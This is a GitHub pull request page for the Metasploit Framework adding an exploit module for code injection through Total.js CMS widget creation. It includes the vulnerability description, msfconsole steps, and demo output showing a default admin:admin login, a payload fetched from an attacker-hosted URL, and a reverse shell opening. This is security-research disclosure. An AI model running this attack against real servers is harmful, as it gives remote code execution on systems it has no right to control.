Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Total.js CMS Code Injection in Widget Creation #12365

Merged
merged 5 commits into from
Oct 21, 2019
Merged

Add Total.js CMS Code Injection in Widget Creation #12365

merged 5 commits into from
Oct 21, 2019

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Sep 25, 2019
edited by wvu
Loading

Description

Total.js is a Node.js Framework for building e-commerce applications, REST services, real-time apps, or apps for Internet of Things (IoT), etc. Total.js CMS is a Content Management System (application) that is part of the Total.js framework. A commercial version is also available, and can be seen used world-wide.

In Total.js CMS, a user with admin permission may be able to create a widget, and extend CMS functionalities for visitors. However, this can also be abused to upload JavaScript code that will be evaluated server side. As a result, it is possible to embed malicious JavaScript in the new widget, and gain remote code execution.

Vulnerable Setup

First, please install node. You can do this easily with brew, for example:

$ brew install node

And then download the following. There is a start.sh, just run that to start the server (will be port 8000):

cms.zip

Verification

  • Start msfconsole
  • set rhosts [ip]
  • set srvhost [ip]
  • set target [id] (0 = Linux, 1 = Mac)
  • set payload [payload name]
  • run
  • You should get a session

Demo

Check

msf5 exploit(multi/http/totaljs_cms_widget_exec) > check
[*] 192.168.0.21:8000 - The target appears to be vulnerable.

Exploit

msf5 exploit(multi/http/totaljs_cms_widget_exec) > run
[*] Exploit running as background job 37.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.21:4444 
[*] Using URL: http://192.168.0.21:8080/vd9qtAXD
[*] Server started.
msf5 exploit(multi/http/totaljs_cms_widget_exec) >
[*] Attempting to authenticate with admin:admin
[+] Authenticatd as: admin:admin
[*] Creating a widget...
[+] Widget created successfully
[*] 192.168.0.21     totaljs_cms_widget_exec - 192.168.0.21 requesting: /vd9qtAXD/p_qxVkK
[*] 192.168.0.21     totaljs_cms_widget_exec - Sending payload to 192.168.0.21
[*] Command shell session 32 opened (192.168.0.21:4444 -> 192.168.0.21:50399) at 2019-09-25 17:00:12 -0500
[*] Finding the payload from the widget list...
[+] Widget cleared successfully

msf5 exploit(multi/http/totaljs_cms_widget_exec) >

@wvu wvu changed the title Add TotaJS CMS Code Injection in Widget Creation Add Total.js CMS Code Injection in Widget Creation Oct 3, 2019
@wvu wvu self-assigned this Oct 10, 2019
@wchen-r7
Copy link
Contributor Author

I have updated the code. Please let me know if there's anything else I need to change. Thanks!

wvu
wvu approved these changes Oct 21, 2019
View reviewed changes
Copy link
Contributor

@wvu wvu left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thank you!

wvu added a commit that referenced this pull request Oct 21, 2019
@wvu
Land #12365, Total.js CMS widget creation RCE
3565b0e
@wvu wvu merged commit 0ebc971 into rapid7:master Oct 21, 2019
msjenkins-r7 pushed a commit that referenced this pull request Oct 21, 2019
@wvu @msjenkins-r7
Land #12365, Total.js CMS widget creation RCE
0e9da7b
@wvu
Copy link
Contributor

wvu commented Oct 21, 2019
edited
Loading

Release Notes

This adds an exploit against the Total.js CMS framework, written in Node.js. An attacker with administrator credentials may create a new widget containing arbitrary JavaScript code that is evaluated server-side.

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 30, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wvu wvu wvu approved these changes

Assignees

@wvu wvu

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wchen-r7 @wvu @tperry-r7